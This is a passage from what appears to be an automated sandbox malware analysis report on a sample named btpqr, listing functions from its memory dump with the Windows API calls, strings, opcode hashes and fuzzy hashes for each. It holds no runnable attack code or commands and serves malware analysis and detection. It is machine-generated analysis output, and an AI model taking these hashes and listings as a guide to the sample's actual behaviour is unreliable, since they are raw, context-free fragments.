                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 40317517d03e6116261dd8d494762f284e116169bc49e2818d3cd3ea17fbdfc3
                                                                                                                        • Instruction ID: 3a3a93bb57438f5bd55cc65b9a62a237aa45d0dbf1e650f9b16c36aba4462076
                                                                                                                        • Opcode Fuzzy Hash: 40317517d03e6116261dd8d494762f284e116169bc49e2818d3cd3ea17fbdfc3
                                                                                                                        • Instruction Fuzzy Hash: F7B09235044208BBCB002BE2ED09B987F68EB09762F008020FA4D44062CB72A4108A99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00419961 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004199BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2161030339-0
                                                                                                                        • Opcode ID: 5e4cecfc98cc53a3a6892422d3cb92dfff38b11bbda293255e3a872dd5be84c0
                                                                                                                        • Instruction ID: 5a1de1cafdc0008697065ac5a381ebc7ce82cbc4b2775fe2aff3c161939ace25
                                                                                                                        • Opcode Fuzzy Hash: 5e4cecfc98cc53a3a6892422d3cb92dfff38b11bbda293255e3a872dd5be84c0
                                                                                                                        • Instruction Fuzzy Hash: 3621CF71500286AFDB24DB25DC52BFB73ACEF05354F10407BE90196181E778EDC8CA59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040D55D Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesW.KERNEL32(0040D549,00000001,?,00418F06,00418FA4,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040D58B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 1d6b754054052e44161c58cb7c8dbe7ea6468bf69e4b1ae51570ae317ea1b3b0
                                                                                                                        • Instruction ID: 291110986aee6bf67339a771edad720e0197ef73788f133867970fa134a305dd
                                                                                                                        • Opcode Fuzzy Hash: 1d6b754054052e44161c58cb7c8dbe7ea6468bf69e4b1ae51570ae317ea1b3b0
                                                                                                                        • Instruction Fuzzy Hash: A0E04F31640208FFDB21DFD1EC41B563BA4A708714F408025FD085A1A0C371E561CF4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040D59A Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,0040DB96,?,?,?,00000002,00000000,00000000,00000000), ref: 0040D5C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 3bc195a8bf4635b4c8cba13acb32fc5adfee0bc034be291de5d085940ae315d7
                                                                                                                        • Instruction ID: 49326b77fbf81c4d81706873689a40bb40e524c85cd16d374a033b3e6af6e169
                                                                                                                        • Opcode Fuzzy Hash: 3bc195a8bf4635b4c8cba13acb32fc5adfee0bc034be291de5d085940ae315d7
                                                                                                                        • Instruction Fuzzy Hash: 29D01736000108FFCF019FE1EC058AA3BA9FF4C328B804425FD0C56560C676A9209B68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B88B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0040B891
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 90d72ffb02b964c9c25c00ea695cecd9db0ea9a22b748caca762a50658afdab6
                                                                                                                        • Instruction ID: 5f84904da837a4ca454253d600cc35636757dca289380c34029062a80d18c87e
                                                                                                                        • Opcode Fuzzy Hash: 90d72ffb02b964c9c25c00ea695cecd9db0ea9a22b748caca762a50658afdab6
                                                                                                                        • Instruction Fuzzy Hash: 09A0113000020CBB8B002B82EE088883FACEA003A0B008020F80C00020CB32A8208A88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0042717B Relevance: .1, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction ID: d4cef14c123f318f4dc0708e9886529440e20d988b0dcd3fd24d82b57bf7ab28
                                                                                                                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction Fuzzy Hash: 0511C236604129AFD710EF69D8809BAB7E9EF147A47848016FC54CB310E338ED91C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0042713E Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction ID: 6b362c47407ed6c6be45d2b5bc4a76b5648cb109d952aba55dc01473114a793a
                                                                                                                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction Fuzzy Hash: BCE09A353A8159AFCB00CBA8DC81D25B3F8EF08320B5402D1F825C73A0E738EE00DA54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00427109 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction ID: 855ab6304ed7df2bf50a7f5d232130ec62c6edd90a5bc1aa0100b227a0869bfa
                                                                                                                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction Fuzzy Hash: 35E01A323146249BC7219B5AE800CA6F7E8EF887B0B894466E98997711C224FC2197A4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0042705F Relevance: .0, Instructions: 7COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404100 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404153
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040416B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404183
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004041D7
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004041F2
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040420A
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404222
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-980797041
                                                                                                                        • Opcode ID: d00e763367ea93f0be7b3ae52dd07dd6286e32095fcc436eda14ceb4681826fe
                                                                                                                        • Instruction ID: faebba4834c9312343b62fe908449e8436bdba343273fae3f362b92bb7ddc594
                                                                                                                        • Opcode Fuzzy Hash: d00e763367ea93f0be7b3ae52dd07dd6286e32095fcc436eda14ceb4681826fe
                                                                                                                        • Instruction Fuzzy Hash: 2431B3B1A4070D6ADB00FAD1C946BEE73A89B10704F90847FFA10B61C3DB7CA5558A1D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004010E0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 136COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 8062bcb29f4417d08298c0f372710fc9734cf30bec9e84d1823aa2fae1ac55af
                                                                                                                        • Instruction ID: 71fe578ee0a6e3aae4d900f27dcf8d7bdfeaccb87f3854a2596ca1d288e3d5d2
                                                                                                                        • Opcode Fuzzy Hash: 8062bcb29f4417d08298c0f372710fc9734cf30bec9e84d1823aa2fae1ac55af
                                                                                                                        • Instruction Fuzzy Hash: 1A517135A006049FDB14DF98C581B99B7B1BF48328F14826EE955BB3E2D739DD41CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040102D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 2be561de364b7eefec319107a9ca3abfa4839370c43c63d925d5480d9b6ee570
                                                                                                                        • Instruction ID: 7e2b88953ddc59ca7d8290bddf8b6609febcac94ef176fc9cfe302d02423cc65
                                                                                                                        • Opcode Fuzzy Hash: 2be561de364b7eefec319107a9ca3abfa4839370c43c63d925d5480d9b6ee570
                                                                                                                        • Instruction Fuzzy Hash: 1641B035B002058FDB14EFA5C580E99B7B1BF88314B55807EE945BB3A2DB39EC81CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004011DA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040123E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040125E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401279
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA$zU$'
                                                                                                                        • API String ID: 2005118841-1149224613
                                                                                                                        • Opcode ID: 8b184054c13764ae6489e3abd2af32b73df591f376b07da0059868633fdc3d20
                                                                                                                        • Instruction ID: 8945a0e2182e9323a9eb24358aa4de406b6f24654ded4e1b20d67fcb0905d669
                                                                                                                        • Opcode Fuzzy Hash: 8b184054c13764ae6489e3abd2af32b73df591f376b07da0059868633fdc3d20
                                                                                                                        • Instruction Fuzzy Hash: AB217A31A006199FDB14EF95D581B9DB3A4BF04314F5081AEE941BB2A2CB7CE944CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004059D0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 222COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$__fseeki64
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 1562470337-980797041
                                                                                                                        • Opcode ID: 7b901750c3b006b18403329904b02a95616e29e54c3a72bdd86c7e660e885a2c
                                                                                                                        • Instruction ID: e4afb9887e55f3fd23489c00240b1fa8d03105eb687ddb5a73c9a15f9ade77ce
                                                                                                                        • Opcode Fuzzy Hash: 7b901750c3b006b18403329904b02a95616e29e54c3a72bdd86c7e660e885a2c
                                                                                                                        • Instruction Fuzzy Hash: E8816831600B089FDB24DF58C884AAAB7B4FF04318F54856EE816AB392D779F945CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401EB0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 163COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401FEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 6fdedb41319aa791db9f9b29d7e6246772572c854f65bd17a2f66eccfe1a473f
                                                                                                                        • Instruction ID: 956062587a368471c5f863c4a76f9bb871fd9b18621f19cd0b730673be78f9f1
                                                                                                                        • Opcode Fuzzy Hash: 6fdedb41319aa791db9f9b29d7e6246772572c854f65bd17a2f66eccfe1a473f
                                                                                                                        • Instruction Fuzzy Hash: 5451AE75A002059FDB14DF95C585BAAB7B4BF44308F54806EE615AB3E2CB79E901CB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402550 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402758
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                          • Part of subcall function 00405650: __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                                        • String ID: cgrgtgfg.$LA$dfggttvcle $gghjjjtyty $wqwqwqwqwwqw.$A$A
                                                                                                                        • API String ID: 2823994529-449312905
                                                                                                                        • Opcode ID: 280a997ca19c133a05dd91fbdb11c7472993ca217331701fb57179110291f512
                                                                                                                        • Instruction ID: 200839d03f1d43d7f151bb8e194b470dcd47b605306f3ece7ea85ca2f4278cdc
                                                                                                                        • Opcode Fuzzy Hash: 280a997ca19c133a05dd91fbdb11c7472993ca217331701fb57179110291f512
                                                                                                                        • Instruction Fuzzy Hash: FC51F6756003149BDB54EF55C806B9A7765AF40308F1080BEF9097B2D1DF79AE8ACF8A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405830 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040591A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
